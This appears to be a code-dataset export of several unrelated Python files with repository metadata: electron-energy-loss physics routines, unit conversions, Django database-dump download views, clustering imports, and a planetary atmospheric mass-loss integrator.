9e2fc6d501f51130b12164997f40cb7e0ec5a654
|
[
"Unlicense"
] | null | null | null |
import numpy as np
from scipy.special import iv as BesselI
gamma = 0.032
n = np.arange(0,50,1)
kmax = max(n) + 20
ep0 = 8.85e-12
epD = 1.0
c = 3e8
Conv = 1.602e-19/6.626e-34*2*np.pi #Conversion from eV to SI-units
def Pow_abs(x_e, c_e, g, R0, R1, omega, epM):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside and
an electron moving on a slightly curved trajectory outside (vertical)
The trajectory of the electron derives from a straight vertical
trajectory in the ellipse frame.
Output: Resistive losses as a function of omega"""
# epM = 1-64/(omega*(omega+1j*gamma))
# omega = omega*Conv
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
for k_n in range(0,np.size(n)):
a_n_s[k_n] = np.exp(-omega/c_e*x_e)/omega*BesselI(k_n,omega*g/c_e)
#Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
#This is for the cosine terms
c_n_c_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1)*(R0*R1)**(2*n) + (epM+1)*R1**(2*n))
c_n_c_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1) + (epM+1)*R1**(2*n))
#This is for the sin terms
c_n_s_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1)*(R0*R1)**(2*n) - (epM+1)*R1**(2*n))
c_n_s_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* (-(epM-1) + (epM+1)*R1**(2*n))
Term1 = sum(n**2/(2*n-1) * (pow(abs(c_n_s_p),2)+pow(abs(c_n_c_p),2) )\
* (R1**(2*n)-R0**(2*n)))
Term2 = sum(n**2/(2*n+1) * (pow(abs(c_n_s_m),2)+pow(abs(c_n_c_m),2) )\
* (R1**(-2*n)-R0**(-2*n)))
return np.pi * ep0/2 * omega * np.imag(epM) * (Term1-Term2)
def Pow_abs_r(x_e, c_e, g, R0, R1, omega, epM):
"""Calculate the power absorbed in an annulus
with a 'circling' electron as exciting source inside and
an electron moving on a slightly curved trajectory outside (vertical)
The trajectory of the electron derives from a straight vertical
trajectory in the ellipse frame.
Output: Resistive losses as a function of omega"""
#epM = 1-64/(omega*(omega+1j*gamma))
#omega = omega*Conv
k0 = omega/3e8
a_n_s = np.zeros(np.size(n), dtype='complex128')
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
for k_n in range(0,np.size(n)):
a_n_s[k_n] = np.exp(-omega/c_e*x_e)/omega*BesselI(k_n,omega*g/c_e)
#Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
#This is for the cosine terms
c_n_c_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1)*(R0*R1)**(2*n) + (epM+1)*R1**(2*n))
c_n_c_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1) + (epM+1)*R1**(2*n))
#This is for the sin terms
c_n_s_m = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* ((epM-1)*(R0*R1)**(2*n) - (epM+1)*R1**(2*n))
c_n_s_p = -2*a_n_s/((epM-1)**2 * R0**(2*n) - (epM+1)**2 * R1**(2*n))\
* (-(epM-1) + (epM+1)*R1**(2*n))
#Radiative reaction
#Denominator C
#k0 = 0
C0 = +1j*np.pi*g**2*k0**2/16.#/R0**2
C = R0**2 * R1**(-2) * (-(epM-1)**2 * (R0/R1)**2 + (epM+1)**2)\
+ C0 * ((epM**2-1) * ((R0/R1)**2-1) * (R0**2 + R1**(-2)))\
+ 1*C0**2 * ((epM+1)**2*(R0/R1)**2 - (epM-1)**2)
#Changed dipole terms
c_n_c_m[1] = 2 * a_n_s[1] * R0**2 / C\
*( (C0*(1-epM) + (1+epM)*R1**(-2))\
- R1**(-2)*(C0*(1+epM) + R0**2*(1-epM)))
c_n_c_p[1] = 2 * a_n_s[1] * R1**(-2) / C\
*( ((epM-1)*R0**2*R1**(-2) - C0*(epM+1)*R0**2)\
+ ((epM+1)*R0**2 - (epM-1)*C0))
c_n_s_m[1] = 2 * a_n_s[1] * R0**2 / C\
*( -(C0*(1-epM) + (1+epM)*R1**(-2))\
- R1**(-2)*(C0*(1+epM) + R0**2*(1-epM)))
c_n_s_p[1] = 2 * a_n_s[1] * R1**(-2) / C\
*( -((epM-1)*R0**2*R1**(-2) - C0*(epM+1)*R0**2)\
+ ((epM+1)*R0**2 - (epM-1)*C0))
Term1 = sum(n**2/(2*n-1) * (pow(abs(c_n_s_p),2)+pow(abs(c_n_c_p),2) )\
* (R1**(2*n)-R0**(2*n)))
Term2 = sum(n**2/(2*n+1) * (pow(abs(c_n_s_m),2)+pow(abs(c_n_c_m),2) )\
* (R1**(-2*n)-R0**(-2*n)))
return np.pi * ep0/2 * omega * np.imag(epM) * (Term1-Term2)
def Pow_sca_r(x_e, c_e, g, R0, R1, omega, epM):
"""Calculate the power scattered by an annulus
with a 'circling' electron as exciting source inside and
an electron moving on a slightly curved trajectory outside (vertical)
The trajectory of the electron derives from a straight vertical
trajectory in the ellipse frame.
Output: Resistive losses as a function of omega"""
#epM = 1-64/(omega*(omega+1j*gamma))
#omega = omega*Conv
k0 = omega/c
gamma_abs = 1j* np.pi**2 * ep0 * g**2/8.0 * k0**2
k_n = 1
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s = np.exp(-omega/c_e*x_e)/omega*BesselI(1,omega*g/c_e)
#Radiative reaction
#Denominator C
C0 = +1j*np.pi*g**2*k0**2/16.#/R0**2
C = R0**2 * R1**(-2) * (-(epM-1)**2 * (R0/R1)**2 + (epM+1)**2)\
+ C0 * ((epM**2-1) * ((R0/R1)**2-1) * (R0**2 + R1**(-2)))\
+ 1*C0**2 * ((epM+1)**2*(R0/R1)**2 - (epM-1)**2)
#Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
#This is for the cosine terms
b_c = -(a_n_s/C*( (C0*(epM+1)**2*(R0/R1)**2 - C0*(epM-1)**2\
- (epM**2-1) * ((R0/R1)**2-1)/R1**2)\
- 4*epM*(R0/R1)**2))\
- 1*a_n_s
#This is for the sin terms
b_s = -(a_n_s/C*( -(C0*(epM+1)**2*(R0/R1)**2 - C0*(epM-1)**2\
- (epM**2-1) * ((R0/R1)**2-1)/R1**2)\
- 4*epM*(R0/R1)**2))\
- 1*a_n_s
return omega/2 * np.imag(gamma_abs * (abs(b_c)**2 + abs(b_s)**2))
def Pow_sca(x_e, c_e, g, R0, R1, omega, epM):
"""Calculate the power scattered by an annulus
with a 'circling' electron as exciting source inside and
an electron moving on a slightly curved trajectory outside (vertical)
The trajectory of the electron derives from a straight vertical
trajectory in the ellipse frame.
Output: Resistive losses as a function of omega"""
# epM = 1-64/(omega*(omega+1j*gamma))
# omega = omega*Conv
k0 = omega/3e8
gamma_abs = 1j* np.pi**2 * ep0 * g**2/8 * k0**2
k_n = 1
###Lambda = 4*pi*eps0 in expression for source coefficients
###Calculate lambda according to formula in ELS_slab_crescent.pdf
a_n_s = np.exp(-omega/c_e*x_e)/omega*BesselI(1,omega*g/c_e)
#Calculate expansion coefficients as in ELS_ellipse_annulus.pdf
#This is for the cosine terms
b_c = (a_n_s /((epM-1)**2 * R0**(2) - (epM+1)**2 * R1**(2))\
*( (epM**2-1) * (R1**(2)-R0**(2))\
- 4*epM * R1**(2) * R0**(2) ) * R0**(-2)) - 1*a_n_s
#This is for the sin terms
b_s = (a_n_s/((epM-1)**2 * R0**(2) - (epM+1)**2 * R1**(2))\
*( -(epM**2-1) * (R1**(2)-R0**(2))\
- 4*epM * R1**(2) * R0**(2) ) * R0**(-2)) - 1*a_n_s
return omega/2 * np.imag(gamma_abs * (abs(b_c)**2 + abs(b_s)**2))
if __name__ == "__main__":
print 'Supposed to be called as a function, not main module'
| 35.350467
| 74
| 0.538929
| 1,422
| 7,565
| 2.7391
| 0.096343
| 0.063671
| 0.041078
| 0.030809
| 0.920924
| 0.91887
| 0.91887
| 0.91887
| 0.91887
| 0.91887
| 0
| 0.089264
| 0.240317
| 7,565
| 213
| 75
| 35.516432
| 0.588481
| 0.168936
| 0
| 0.652174
| 0
| 0
| 0.016434
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.021739
| null | null | 0.01087
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f166d2f1c26bbbe7c2f062c5a27fc960f62b1bb
| 1,104
|
py
|
Python
|
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
units/volume/kilolitres.py
|
putridparrot/PyUnits
|
4f1095c6fc0bee6ba936921c391913dbefd9307c
|
[
"MIT"
] | null | null | null |
# <auto-generated>
# This code was generated by the UnitCodeGenerator tool
#
# Changes to this file will be lost if the code is regenerated
# </auto-generated>
def to_millilitres(value):
return value * 1000000.0
def to_litres(value):
return value * 1000.0
def to_teaspoons(value):
return value / 0.000005919390467447916
def to_tablespoons(value):
return value / 0.000017758171402343747
def to_quarts(value):
return value / 0.00113652296975
def to_pints(value):
return value / 0.000568261484874999889
def to_gallons(value):
return value / 0.0045460918799
def to_fluid_ounces(value):
return value / 0.0000284130742437499946
def to_u_s_teaspoons(value):
return value / 0.000004928921593749999
def to_u_s_tablespoons(value):
return value / 0.000014786764781249998
def to_u_s_quarts(value):
return value / 0.000946352945999999959
def to_u_s_pints(value):
return value / 0.000473176472999999979
def to_u_s_gallons(value):
return value / 0.003785411784
def to_u_s_fluid_ounces(value):
return value / 0.0000295735296
def to_u_s_cups(value):
return value / 0.000236588236499999989
| 29.052632
| 62
| 0.786232
| 160
| 1,104
| 5.23125
| 0.30625
| 0.089606
| 0.286738
| 0.264038
| 0.360812
| 0.066906
| 0
| 0
| 0
| 0
| 0
| 0.280628
| 0.134964
| 1,104
| 37
| 63
| 29.837838
| 0.595812
| 0.134964
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
8f3ba647650e44d380b1e43ba2cd214ef20ee471
| 2,020
|
py
|
Python
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | 4
|
2019-01-14T15:44:22.000Z
|
2019-01-16T16:07:19.000Z
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | 2
|
2019-02-01T00:50:20.000Z
|
2019-02-22T15:15:54.000Z
|
dbbackup/views.py
|
zyayoung/lab-item-tracking
|
6d0ee000114300d6693ec078f974b9a6ef4dfe40
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import StreamingHttpResponse
import subprocess
from login.utils import check_admin
@check_admin
def users(request):
def file_iterator(file_name, chunk_size=512):
with subprocess.Popen(['python', 'manage.py', 'dumpdata', 'login'], stdout=subprocess.PIPE) as f:
while True:
c = f.stdout.read(chunk_size)
if c:
yield c
else:
break
the_file_name = "login.json"
response = StreamingHttpResponse(file_iterator(the_file_name))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename="{0}"'.format(the_file_name)
return response
@check_admin
def inventory(request):
def file_iterator(file_name, chunk_size=512):
with subprocess.Popen(['python', 'manage.py', 'dumpdata', 'inventory'], stdout=subprocess.PIPE) as f:
while True:
c = f.stdout.read(chunk_size)
if c:
yield c
else:
break
the_file_name = "inventory.json"
response = StreamingHttpResponse(file_iterator(the_file_name))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename="{0}"'.format(the_file_name)
return response
@check_admin
def log(request):
def file_iterator(file_name, chunk_size=512):
with subprocess.Popen(['python', 'manage.py', 'dumpdata', 'log'], stdout=subprocess.PIPE) as f:
while True:
c = f.stdout.read(chunk_size)
if c:
yield c
else:
break
the_file_name = "log.json"
response = StreamingHttpResponse(file_iterator(the_file_name))
response['Content-Type'] = 'application/octet-stream'
response['Content-Disposition'] = 'attachment;filename="{0}"'.format(the_file_name)
return response
| 34.237288
| 109
| 0.623267
| 228
| 2,020
| 5.359649
| 0.241228
| 0.07856
| 0.081015
| 0.05401
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0.851064
| 0
| 0.008086
| 0.265347
| 2,020
| 58
| 110
| 34.827586
| 0.815364
| 0
| 0
| 0.734694
| 0
| 0
| 0.177228
| 0.072772
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.081633
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71343eb77c2d7294243704ddcde710c1d5f15a45
| 826
|
py
|
Python
|
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | 1
|
2021-04-14T14:17:14.000Z
|
2021-04-14T14:17:14.000Z
|
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | null | null | null |
cluster/utils/__init__.py
|
jzenn/cluster
|
500761d4db5104b9247b13de7293a9157f10986b
|
[
"MIT"
] | null | null | null |
from .visualization import visualize_clusters_2d, visualize_graph_2d
from .graph import (
eps_graph_from_similarity_matrix,
fc_graph_from_similarity_matrix,
kNN_graph_from_similarity_matrix,
mkNN_graph_from_similarity_matrix,
)
from .similarity import (
get_similarity_matrix,
get_random_similarity_matrix,
get_distance_matrix_from_similarity_matrix,
get_similarity_matrix_from_distance_matrix,
)
__all__ = [
"get_similarity_matrix",
"get_random_similarity_matrix",
"get_distance_matrix_from_similarity_matrix",
"get_similarity_matrix_from_distance_matrix",
"eps_graph_from_similarity_matrix",
"fc_graph_from_similarity_matrix",
"kNN_graph_from_similarity_matrix",
"mkNN_graph_from_similarity_matrix",
"visualize_clusters_2d",
"visualize_graph_2d",
]
| 28.482759
| 68
| 0.805085
| 100
| 826
| 5.91
| 0.17
| 0.433164
| 0.338409
| 0.338409
| 0.896785
| 0.896785
| 0.778342
| 0.778342
| 0.778342
| 0.778342
| 0
| 0.005602
| 0.135593
| 826
| 28
| 69
| 29.5
| 0.822129
| 0
| 0
| 0
| 0
| 0
| 0.363196
| 0.341404
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.12
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
85603fa2484aafa9f70f7b959a6fd5313c57fc61
| 48,388
|
py
|
Python
|
platypos/mass_evolution_function.py
|
soumitrahazra/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | 10
|
2020-05-11T16:12:04.000Z
|
2022-02-27T00:47:19.000Z
|
platypos/mass_evolution_function.py
|
lketzer/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | null | null | null |
platypos/mass_evolution_function.py
|
lketzer/platypos
|
f4042f42a1727ff40e7c713656ef8760ba943a03
|
[
"MIT"
] | 1
|
2021-11-29T23:39:59.000Z
|
2021-11-29T23:39:59.000Z
|
import numpy as np
import math
import astropy.units as u
from astropy import constants as const
from platypos.lx_evo_and_flux import lx_evo, l_xuv_all
from platypos.lx_evo_and_flux import flux_at_planet_earth, flux_at_planet
import platypos.planet_models_LoFo14 as plmoLoFo14
import platypos.planet_model_Ot20 as plmoOt20
import platypos.beta_K_functions as bk
from platypos.mass_loss_rate_function import mass_loss_rate_forward_LO14
from platypos.mass_loss_rate_function import mass_loss_rate_forward_Ot20
def mass_planet_RK4_forward_LO14(epsilon, K_on, beta_on, planet_object,
initial_step_size, t_final, track_dict):
"""USED: 4th order Runge-Kutta as numerical integration method
Integrate from the current time (t_start (where planet has R0 and M0)
into the future taking into account photoevaporative mass loss.
Parameters:
-----------
epsilon (float): evaporation efficiency
K_on (str): set use of K parameter on or off ("on" or "off)
beta_on (str): set use of beta parameter on or off ("on" or "off)
planet_object: object of planet class which contains also stellar
parameters and info about stellar evo track
step_size (float): initial step_size, variable
t_final (float): final time of simulation
track_dict (dict): dictionary with Lx evolutionary track parameters
[NOTE: the implementation of a variable step size is somewhat preliminary.
The step size is adjusted (made smaller or bigger depending how fast or
slow the mass/radius changes) until the final time step greater than
t_final. This means that if the step size in the end is e.g. 10 Myr, and
the integration is at 4999 Myr, then last time entry will be 4999+10 ->
5009 Myr.]
Returns:
--------
t_arr (array): time array to trace mass and radius evolution
M_arr (array): mass array with mass evolution over time (mass decrease)
R_arr (array): radius array with radius evolution over time (from
thermal contraction and photoevaporative mass-loss)
Lx_arr (array): array to trace the X-ray luminosity (mainly for
consistency checks)
"""
# define some constants
M_EARTH = const.M_earth.cgs.value
Myr_to_sec = 1e6*365*86400
# initialize the starting values for the X-ray luminosity at t_start,
# the starting planet parameters, as well as beta & K (at t_start);
# convert X-ray to XUV lum. and calculate planet's high energy
# incident flux
Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
Lxuv0 = l_xuv_all(Lx0)
Fxuv0 = flux_at_planet(Lxuv0, planet_object.distance)
f_env_0 = f_env = planet_object.fenv
R0 = R = planet_object.radius
M0 = M = planet_object.mass
rho0 = rho = plmoLoFo14.density_planet(M0, R0)
M_env0 = M_env = M0 - planet_object.core_mass
M_core = planet_object.core_mass
R_core = planet_object.core_radius
# CRITERION for when the planet has lost all atmosphere
# for the LoFo14 planets the core mass and thus the core radius is fixed.
# So when the planet mass gets smaller or equal to the core mass, we
# assume only the bare rocky core is left.
if beta_on == "yes":
beta = beta0 = bk.beta_fct(M0, Fxuv0, R0)
elif beta_on == "no":
beta = beta0 = 1.
if K_on == "yes":
K = K0 = bk.K_fct(planet_object.distance, M0,
planet_object.mass_star, R0)
elif K_on == "no":
K = K0 = 1.
# since the step size is adaptive, I use lists to keep track of
# the time, mass, radius and Lx evolution
M_arr = []
M_arr.append(M0)
R_arr = []
R_arr.append(R0)
t_arr = []
t0 = t = track_dict["t_start"]
t_arr.append(t0)
Lx_arr = []
Lx_arr.append(Lx0)
dt = initial_step_size
# NOTE: minimum and maximum step size are HARDCODED for now (see further
# down in code for more details)
min_step_size, max_step_size = 1e-2, 10.
i = 1 # counter to track how many traced RK iterations have been performed
j = 1 # counter to track how many RK iterations have been attempted.
envelope_left = True # variable to flag a planet if envelope is gone
close_to_evaporation = False # variable to flag if planet is close to
# complete atmospheric removal
# make list with all step sizes, even those which resulted in too drastic
# radius changes -> then I can check if the code gets stuck in an infinite
# loop between make_bigger, make_smaller, make_bigger, etc..
step_size_list = []
while t <= t_final:
#print(i, j, " t= ", t, dt)
# This step (Lx(t) calculation) is just for me to trace Lx and check
# if it is correct. It is NOT required since the Lx(t) calculation is
# embedded in the mass_loss_rate_fancy function)
Lx_i = lx_evo(t=t, track_dict=track_dict)
# IMPORTANT points on the time step:
# When the initial time step is too large OR the planet mass becomes
# very close to the core mass (after several time steps), it can happen
# that one of the RK substeps leads to such a large mass lost that the
# new planet mass is smaller than the core mass.
# Distinguish between two cases:
# 1) initial time step is too large such that M_lost = nan after the
# first iteration (i.e. Rk substep mass < core mass)
# -> immediately switch to lowest possible step size and let code run
# from there (i.e. code will make step size bigger again if necessary)
# 2) at the end of planet evolution when the planet mass gets very
# close to the core mass, at some point the mass lost is larger than
# the renmaining atmosphere mass (either at the end of a coplete RK
# iteration, or this already happends in one of the RK substeps, in
# which case the mass lost after the complete RK step evaluates to nan
# and no new planet radius can be calculated). In both cases the planet
# is assumed to be fully evaporated at t_i + dt.
# add the current step size
step_size_list.append(dt)
# take the last 20 entries in step_size_array and check for
# constant back-and-forth between two step sizes
# e.g. [0.1, 1.0, 0.1, 1.0, ...]
# check if difference is the same, but values in array are not all
# the same; also need to check if every 2nd element is the same,
# same goes for 2(n+1)th
step_size_array = np.array(step_size_list)
step_size_difference = abs(np.diff(step_size_array[-20:]))
if (len(step_size_array) >= 20): # check only after a 20 iterations
if (np.all(step_size_difference == step_size_difference[0]) and
~np.all(step_size_array == step_size_array[0]) and
np.all(step_size_array[::2] == step_size_array[0]) and
np.all(step_size_array[1::2] == step_size_array[1])):
print("no convergence, set min. step size.")
# if no convergence, switch to minumum step size
dt = min_step_size
# else, all is good, continue with current step size
while (envelope_left == True):
# go through RK iterations as long as there is envelope left
# apply Runge Kutta 4th order to find next value of M_dot
# NOTE: the mass lost in one timestep is in Earth masses
Mdot1 = mass_loss_rate_forward_LO14(t, epsilon, K_on,
beta_on, planet_object,
f_env, track_dict)
k1 = (dt * Myr_to_sec * Mdot1) / M_EARTH
M_05k1 = M + 0.5 * k1 # mass after 1st RK step
M_env_05k1 = M_05k1 - M_core
f_env_05k1 = (M_env_05k1 / M_05k1) * 100 # new envelope mass frac.
if (i == 1) and (j == 1) and (M_05k1 < M_core):
# then I am still in the first RK iteration, and the initial
# step size was likely too large -> set step size to minumum
dt = min_step_size
j += 1
break
Mdot2 = mass_loss_rate_forward_LO14(t+0.5*dt, epsilon, K_on,
beta_on, planet_object,
f_env_05k1, track_dict)
k2 = (dt * Myr_to_sec * Mdot2) / M_EARTH
M_05k2 = M + 0.5 * k2
M_env_05k2 = M_05k2 - M_core
f_env_05k2 = (M_env_05k2 / M_05k2) * 100
if (i == 1) and (j == 1) and (M_05k2 < M_core):
dt = min_step_size
j += 1
break
Mdot3 = mass_loss_rate_forward_LO14(t + 0.5*dt, epsilon, K_on,
beta_on, planet_object,
f_env_05k2, track_dict)
k3 = (dt * Myr_to_sec * Mdot3) / M_EARTH
M_k3 = M + k3
M_env_k3 = M_k3 - M_core
f_env_k3 = (M_env_k3 / M_k3) * 100
if (i == 1) and (j == 1) and (M_k3 < M_core):
dt = min_step_size
j += 1
break
Mdot4 = mass_loss_rate_forward_LO14(t + dt, epsilon, K_on,
beta_on, planet_object,
f_env_k3, track_dict)
k4 = (dt * Myr_to_sec * Mdot4) / M_EARTH
# total mass lost after time-step dt
M_lost = (k1 + 2*k2 + 2*k3 + k4) / 6.
# update next value of the planet mass
M_new = M + M_lost
M_env_new = M_new - M_core
# now it is time to check if atmosphere is gone or
# if planet is close to complete atmosphere removal
if ((np.isnan(M_lost) == True) \
or (np.iscomplex(M_new) == True)) \
and (dt == min_step_size):
# if M_lost = nan (i.e. planet evaporates in one of the RK
# steps) OR the four RK steps finish and the new planet mass is
# smaller or equal to the core mass, then the planet counts as
# evaporated!
# if this condition is satisfied and the step size is already
# at a minimum, then we assume the current RK iteration would
# remove all atmosphere and only the rocky core is left at
# t_i+dt; this terminates the code and returns the final planet
# properties
#print("Atmosphere has evaportated! Only bare rocky core left!"\
# + " STOP this madness!")
# since the the stop criterium is reached, we assume at t_i+1
# the planet only consists of the bare rocky core with the
# planet mass equal to the core mass and the planet radius
# equal to the core radius
t_arr.append(t_arr[-1]+dt)
M_arr.append(M_core)
R_arr.append(R_core)
Lx_arr.append(lx_evo(t=t_arr[-1]+dt, track_dict=track_dict))
envelope_left = False # set flag for complete env. removal
j += 1
break
elif ((np.isnan(M_lost) == True) \
or (np.iscomplex(M_new) == True)) \
and (dt > min_step_size) \
and (close_to_evaporation == False):
#print("close to evaporation")
# planet close to evaporation, but since the step size is not
# minimum yet, we set it to its minimum value and run the RK
# iteration again (until above stopping condition is fulfilled)
dt = min_step_size
close_to_evaporation = True
# this variable is for making sure the code does not run into
# an infinite loop when the planet is close to evaporation.
# Once this condition is set to True, the code continues with
# a fixed min. step size and is no longer allowed to adjust it.
j += 1
break
# this part is new compared to the one used in the PAPER (there we
# used a fixed step size!)
# if you're still in the while loop at this point, then calculate
# new radius and check how drastic the radius change would be;
# adjust the step size if too drastic or too little
f_env_new = (M_env_new/M_new)*100 # in %
R_new = plmoLoFo14.calculate_planet_radius(
M_core, f_env_new, t,
flux_at_planet_earth(
planet_object.Lbol,
planet_object.distance),
planet_object.metallicity
)
#print("R_new, f_new: ", R_new, f_env_new)
#print(abs((R-R_new)/R)*100)
# only adjust step size if planet is not close to complete evaporat.
if (close_to_evaporation == False):
#print("radius check")
# then do the check on how much the radius changes
# R(t_i) compared to R(t_i+dt);
# if radius change is larger than 0.5%, make step size smaller
# by factor 10 OR if radius change is smaller than 0.02%, make
# step size bigger by factor 10, but not bigger or smaller than
# max. or min. step size!
# if radius change too much/little, do not write anything to
# file, instead do RK iteration again with new step size
R_change = abs((R-R_new)/R)*100 # radius change compared to
# previous radius - in percent
if (R_change > 0.5) \
and (t < track_dict["t_curr"]) \
and (dt > min_step_size):
dt = dt / 10.
j += 1
break
#elif ((R_change < 1.) \
# and (R_change >=0.1)) \
# and (t < track_dict["t_curr"]) \
# and (dt > min_step_size):
# dt = dt / 10.
# break
elif (R_change < (0.02)) \
and (t < track_dict["t_curr"]) \
and (dt < max_step_size):
dt = dt * 10.
j += 1
break
# NOTE: in principle I can adjust the code such that these
# hardcoded parameters are different for early planet evolution
# where much more is happening typically, and late planet
# evolution where almost no change is occurring anymore
elif (R_change > 0.5) \
and (t >= track_dict["t_curr"]) \
and (dt > min_step_size):
dt = dt / 10.
j += 1
break
elif (R_change < (0.02)) \
and (t >= track_dict["t_curr"]) \
and (dt < max_step_size):
dt = dt * 10
j += 1
break
else: # if radius change is ok
# do sanity check: is new planet mass is still greater than
# the core mass? ->then there is still some atmosphere left
# in this case update params and go into next RK iteration
if ((M + M_lost) - M_core) > 0:
M = M + M_lost # new planet mass (M_lost is negative)
t = t_arr[-1] + dt # updated time value t_i_plus_1
M_arr.append(M)
t_arr.append(t)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
# calculate new envelope mass fraction:
M_env = M - M_core
f_env = (M_env/M)*100 # in %
# calculate new radius with new planet mass/envelope
# mass fraction & one time step later
R = plmoLoFo14.calculate_planet_radius(
M_core, f_env, t,
flux_at_planet_earth(
planet_object.Lbol,
planet_object.distance),
planet_object.metallicity
)
R_arr.append(R)
i += 1 # update step to i+1
j += 1
else:
# this should never happen
sys.exit('sth went wrong of you see this!')
break
elif (close_to_evaporation == True):
# if this condition is true, do not adjust step size
# based on the radius change
if ((M + M_lost) - M_core) > 0:
M = M + M_lost # new planet mass (M_lost is negative)
t = t_arr[-1] + dt # updated time value t_i_plus_1
M_arr.append(M)
t_arr.append(t)
Lx_arr.append(lx_evo(t=t, track_dict=track_dict))
# calculate new envelope mass fraction:
M_env = M - M_core
f_env = (M_env/M)*100 # in %
# calculate new radius with new planet mass/envelope mass
# fraction & one time step later
R = plmoLoFo14.calculate_planet_radius(
M_core, f_env, t,
flux_at_planet_earth(
planet_object.Lbol,
planet_object.distance),
planet_object.metallicity
)
R_arr.append(R)
i += 1 # update step to i+1
j += 1
else:
sys.exit('sth went wrong of you see this!')
break
if (envelope_left == False):
# planet has evaporated, so return last planet params for bare core
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
#print("Done!")
return np.array(t_arr), np.array(M_arr), \
np.array(R_arr), np.array(Lx_arr)
def mass_planet_RK4_forward_LO14_PAPER(epsilon, K_on, beta_on,
planet_object, initial_step_size,
t_final, track_dict):
"""USED: 4th order Runge-Kutta as numerical integration method
Integrate from the current time (t_start (where planet has R0 and M0)
into the future taking into account photoevaporative mass loss.
Step size is fixed!
Parameters:
-----------
epsilon (float): evaporation efficiency
K_on (str): set use of K parameter on or off ("on" or "off)
beta_on (str): set use of beta parameter on or off ("on" or "off)
planet_object: object of planet class which contains also stellar
parameters and info about stellar evo track
step_size (float): fixed
t_final (float): final time of simulation
track_dict (dict): dictionary with Lx evolutionary track parameters
Returns:
--------
t_arr (array): time array to trace mass and radius evolution
M_arr (array): mass array with mass evolution over time (mass decrease)
R_arr (array): radius array with radius evolution over time (from
thermal contraction and photoevaporative mass-loss)
Lx_arr (array): array to trace the X-ray luminosity (mainly for
consistency checks)
"""
M_EARTH = const.M_earth.cgs.value
Myr_to_sec = 1e6*365*86400
# initialize the starting values for Lxuv(t_start), mass, density, beta, K
Lx0 = lx_evo(t=track_dict["t_start"], track_dict=track_dict)
